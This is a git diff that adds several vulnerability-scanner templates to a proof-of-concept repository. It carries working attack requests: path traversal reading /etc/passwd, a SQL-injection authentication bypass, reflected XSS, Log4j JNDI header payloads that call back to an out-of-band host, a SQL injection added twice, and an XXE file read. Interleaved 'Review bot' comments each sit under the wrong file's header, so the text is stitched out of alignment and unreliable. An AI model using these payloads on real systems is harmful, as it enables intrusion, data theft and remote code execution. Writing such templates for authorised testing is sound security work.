diff --git a/date.txt b/date.txt
index e88fa6b412..ff13db4fe3 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240630
+20240701
diff --git a/poc.txt b/poc.txt
index 5bcde3bc17..23d7b3cd9e 100644
--- a/poc.txt
+++ b/poc.txt
@@ -40498,6 +40498,7 @@
 ./poc/cve/cve-2015-4414-2530.yaml
 ./poc/cve/cve-2015-4414-2531.yaml
 ./poc/cve/cve-2015-4414-2532.yaml
+./poc/cve/cve-2015-4414.yaml
 ./poc/cve/cve-2015-4632-2533.yaml
 ./poc/cve/cve-2015-4632-2534.yaml
 ./poc/cve/cve-2015-4632-2535.yaml
@@ -43042,6 +43043,7 @@
 ./poc/cve/cve-2020-17506-4681.yaml
 ./poc/cve/cve-2020-17506-4682.yaml
 ./poc/cve/cve-2020-17506-4683.yaml
+./poc/cve/cve-2020-17506.yaml
 ./poc/cve/cve-2020-17518-4684.yaml
 ./poc/cve/cve-2020-17518-4685.yaml
 ./poc/cve/cve-2020-17518-4686.yaml
@@ -45222,6 +45224,7 @@
 ./poc/cve/cve-2021-42565-6511.yaml
 ./poc/cve/cve-2021-42565-6512.yaml
 ./poc/cve/cve-2021-42565-6513.yaml
+./poc/cve/cve-2021-42565.yaml
 ./poc/cve/cve-2021-42566-1(1).yaml
 ./poc/cve/cve-2021-42566-2(1).yaml
 ./poc/cve/cve-2021-42566-6514.yaml
@@ -51629,6 +51632,7 @@
 ./poc/header/insert-headers-and-footers.yaml
 ./poc/header/jenkins-headers-detect.yaml
 ./poc/header/jfrog-version-header.yaml
+./poc/header/log4j-all-headers.yaml
 ./poc/header/log4j-header.yaml
 ./poc/header/maxforwards-headers-detect.yaml
 ./poc/header/missing-hsts-header.yaml
@@ -98129,6 +98133,7 @@
 ./poc/sql/nd-shortcodes-1df3ea9dadde70dead5b7fe3f433db07.yaml
 ./poc/sql/nd-shortcodes-59ae582069dfefb7ecef9bedbd9caeab.yaml
 ./poc/sql/nd-shortcodes-f29dbb12c2996c2a86af0c78d896fbe5.yaml
+./poc/sql/netoray-sqli.yaml
 ./poc/sql/netwin-dbabble.yaml
 ./poc/sql/neuvoo-jobroll-7575942edfc25ccc362dbf6031c222eb.yaml
 ./poc/sql/new-order-notification-for-woocommerce-49439a7e50ee67cd1bb7eb21dbcf870f.yaml
@@ -100957,6 +100962,7 @@
 ./poc/sql_injection/mysqldumper.yaml
 ./poc/sql_injection/mysqlman.yaml
 ./poc/sql_injection/mywebsql.yaml
+./poc/sql_injection/netoray-sqli.yaml
 ./poc/sql_injection/niushop-sqli.yaml
 ./poc/sql_injection/notificationx-sqli.yaml
 ./poc/sql_injection/oa8000-workflowservice-sql-inject.yaml
@@ -111472,6 +111478,7 @@
 ./poc/xml_external_entity/yongyou-ufida-oa-uapws-xxe.yaml
 ./poc/xml_external_entity/yongyou_soapFormat_xxe.yaml
 ./poc/xml_external_entity/yongyou_xxe.yaml
+./poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml
 ./poc/xml_external_entity/yonyou-u8-cloud-xchangeservlet-xxe.yaml
 ./poc/xml_external_entity/yonyou-u8cloud-hrss-xxe.yaml
 ./poc/xml_external_entity/yonyou_EHR-xxe-smartweb2.yaml
diff --git a/poc/cve/cve-2015-4414.yaml b/poc/cve/cve-2015-4414.yaml
new file mode 100644
index 0000000000..b534590b27
--- /dev/null
+++ b/poc/cve/cve-2015-4414.yaml
@@ -0,0 +1,35 @@
+id: CVE-2015-4414
+
+info:
+ name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/37274
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
+ - https://www.exploit-db.com/exploits/37274/
+ - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
+ classification:
+ cve-id: CVE-2015-4414
+ metadata:
+ google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/poc/cve/cve-2020-17506.yaml b/poc/cve/cve-2020-17506.yaml
new file mode 100644
index 0000000000..fee3f8e5ff
--- /dev/null
+++ b/poc/cve/cve-2020-17506.yaml
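Review bot: The `reference` list under `info` carries the exploit-db advisory twice (`https://www.exploit-db.com/exploits/37274` and the same URL with a trailing slash); drop the duplicate. The `classification` block holds only `cve-id`, while the sibling `cve-2021-42565.yaml` added in this commit also records `cvss-metrics`, `cvss-score` and `cwe-id`; for a path-traversal file read the weakness is `cwe-id: CWE-22`, and the CVSS values should be copied from the NVD entry already listed under `reference` rather than guessed. The `root:.*:0:0:` regex paired with `status: 200` is a sound positive signal and does not need changing.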
@@ -0,0 +1,42 @@
+id: CVE-2020-17506
+
+info:
+ name: Artica Web Proxy 4.30 Authentication Bypass
+ author: dwisiswant0
+ severity: critical
+ description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
+
+ # Artica Web Proxy 4.30.00000000
+ # allows remote attacker to bypass privilege detection
+ # and gain web backend administrator privileges
+ # through SQL injection of the apikey parameter in fw.login.php.
+ # -
+ # References:
+ # > https://blog.max0x4141.com/post/artica_proxy/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+ redirects: true
+ max-redirects: 1
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "artica-applianc"
+ - type: status
+ status:
+ - 200
+ - 301
+ - 302
+ condition: or
+ - type: word
+ name: session
+ words:
+ - "PHPSESSID"
+ part: header
+ extractors:
+ - type: kval
+ kval:
+ - "PHPSESSID"
diff --git a/poc/cve/cve-2021-42565.yaml b/poc/cve/cve-2021-42565.yaml
new file mode 100644
index 0000000000..f860c4f25f
--- /dev/null
+++ b/poc/cve/cve-2021-42565.yaml
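Review bot: The only source for this template lives in a YAML comment (`# > https://blog.max0x4141.com/post/artica_proxy/`) and the `info` block has no `reference:`, `tags:` or `classification:` key, so nuclei can neither surface the advisory in its output nor select the template with `-tags cve`; move the URL into `reference:`, add `tags: cve,cve2020,artica,sqli` and `classification: cve-id: CVE-2020-17506` as the sibling CVE templates in this commit do, and delete the comment block that merely repeats `description`. The third matcher (`name: session`) only checks that a `PHPSESSID` header is present, which any PHP page that starts a session produces, so combined with the permissive status set (`200`/`301`/`302`, `condition: or`) the template is likely to report a bypass on a plain login page; the positive signal should be something only the authenticated backend returns.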
@@ -0,0 +1,41 @@
+id: CVE-2021-42565
+
+info:
+ author: madrobot
+ name: myfactory FMS - Reflected Cross-Site Scripting
+ severity: medium
+ description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42565
+ - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-42565
+ cwe-id: CWE-79
+ tags: cve,cve2021,myfactory,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ""
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+# Enhanced by mp on 2022/02/27
diff --git a/poc/header/log4j-all-headers.yaml b/poc/header/log4j-all-headers.yaml
new file mode 100644
index 0000000000..55d109ae39
--- /dev/null
+++ b/poc/header/log4j-all-headers.yaml
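Review bot: The body word matcher contains an empty string (`- ""` followed by `condition: and`), and an empty word matches every response, so this template fires on any `200` `text/html` reply from the login page whether or not the `UID` value is reflected. The intended entry appears to have been lost in transit (the `words` list should hold the URL-decoded form of the `UID` value that `path` already sends, so that the match proves reflection); restore it, after which `condition: and` on a single word is redundant and can go. The `# Enhanced by mp on 2022/02/27` trailer is a provenance note, not template metadata; if the project wants it kept, `metadata:` is the place where tooling can read it.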
@@ -0,0 +1,55 @@
+id: log4j-fuzz-head-poc
+
+info:
+ name: log4j-rce漏洞
+ author: xxx
+ severity: critical
+ tags: apache,rce
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ {{log4j_payloads}}
+
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ {{log4j_payloads}}
+ payloads:
+ log4j_payloads:
+ - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'User-Agent: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Referer: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'CF-Connecting_IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'True-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Real-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Forwarded: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Contact: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}'
+ - 'Host: ${jndi:ldap://{{interactsh-url}}/info}'
+
+ attack: clusterbomb
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ name: http
+ words:
+ - "http"
+
+ - type: word
+ part: interactsh_protocol
+ name: dns
+ words:
+ - "dns"
diff --git a/poc/sql/netoray-sqli.yaml b/poc/sql/netoray-sqli.yaml
new file mode 100644
index 0000000000..51e116903a
--- /dev/null
+++ b/poc/sql/netoray-sqli.yaml
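Review bot: The `log4j_payloads` list repeats `X-Forwarded-For` and `X-Client-IP`, so those two headers are sent twice per request method for no extra coverage, and the final `Host:` entry is injected into raw requests that already fix `Host: {{Hostname}}`, yielding a request with two Host headers that servers may reject before any logging occurs; remove the duplicates and the `Host` entry. `CF-Connecting_IP` with an underscore does not follow the hyphenated spelling used by every other entry and looks like a typo. The `info` block also needs real metadata before this is usable in a scan report: `author: xxx`, no `reference` (the CVE-2021-44228 advisory is the obvious one), and `tags: apache,rce` with no `log4j` or `oast` tag, while the `id: log4j-fuzz-head-poc` does not correspond to the file name `log4j-all-headers`.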
@@ -0,0 +1,24 @@
+id: Netoray-sqli
+
+info:
+ name: Netoray上网行为管理系统sql注入漏洞
+ author: Str1am
+ severity: high
+ reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html
+ tags: Netoray,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "c4ca4238a0b923820dcc509a6f75849b"
+ part: body
+ condition: and
diff --git a/poc/sql_injection/netoray-sqli.yaml b/poc/sql_injection/netoray-sqli.yaml
new file mode 100644
index 0000000000..51e116903a
--- /dev/null
+++ b/poc/sql_injection/netoray-sqli.yaml
@@ -0,0 +1,24 @@
+id: Netoray-sqli
+
+info:
+ name: Netoray上网行为管理系统sql注入漏洞
+ author: Str1am
+ severity: high
+ reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html
+ tags: Netoray,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "c4ca4238a0b923820dcc509a6f75849b"
+ part: body
+ condition: and
diff --git a/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml b/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml
new file mode 100644
index 0000000000..b1381ba1eb
--- /dev/null
+++ b/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml
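Review bot: This template is added a second time, byte-for-byte, as `poc/sql_injection/netoray-sqli.yaml` (same blob `51e116903a`, next hunk on this line), so a run over the repository loads two templates with the same `id: Netoray-sqli`; nuclei reports duplicate template ids and every target is probed twice. Keep one copy and drop the other from both the tree and `poc.txt`. Within the template itself, `id` and `tags` capitalise `Netoray` while the other ids in this commit are lower-case (`id: netoray-sqli` and `tags: netoray,sqli` would match), and `condition: and` on a single-word matcher is redundant. The `c4ca4238a0b923820dcc509a6f75849b` marker is the expected `md5(1)` output, which is a precise enough signal to keep as is.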
@@ -0,0 +1,34 @@
+id: yonyou-u8-cloud-showRPCLoadingTip-xxe
+
+info:
+ name: Ufida U8-Cloud smartweb2.showRPCLoadingTip.d XXE
+ author: Co5mos
+ severity: critical
+ description: |
+ 用友U8-Cloud `smartweb2.showRPCLoadingTip.d` 接口存在XXE漏洞,攻击者可以利用此漏洞读取服务器上的任意文件。
+ metadata:
+ fofa-query: app="用友-U8-Cloud"
+ tags: xxe, ufida, cloud
+
+http:
+ - raw:
+ - |
+ POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&__rpc=true&windows=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ __type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%221%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%221%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+
+ - type: status
+ status:
+ - 200
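Review bot: The `info` block has no `reference` entry, so a finding from this template cites nothing, and `tags: xxe, ufida, cloud` writes spaces after the commas where every other template in this commit uses the compact `xxe,ufida,cloud` form; `id` also says `yonyou` while `name` says `Ufida` for the same vendor, so pick one spelling for grep-ability. Decoding the `__xml` value shows the RPC envelope invokes `method="resetPwd"` on dataset `dsResetPwd` with an inserted row for user `1`, which suggests (inferred, not verified here) that the request can reach the password-reset handler even when the external entity is not expanded; confirm the probe is side-effect free, or state the risk in `description`, before it runs against production hosts. The file read targets `c:/windows/win.ini` only, so the `bit app support`/`fonts`/`extensions` matchers yield a false negative on non-Windows deployments; the description should say the check is Windows-specific.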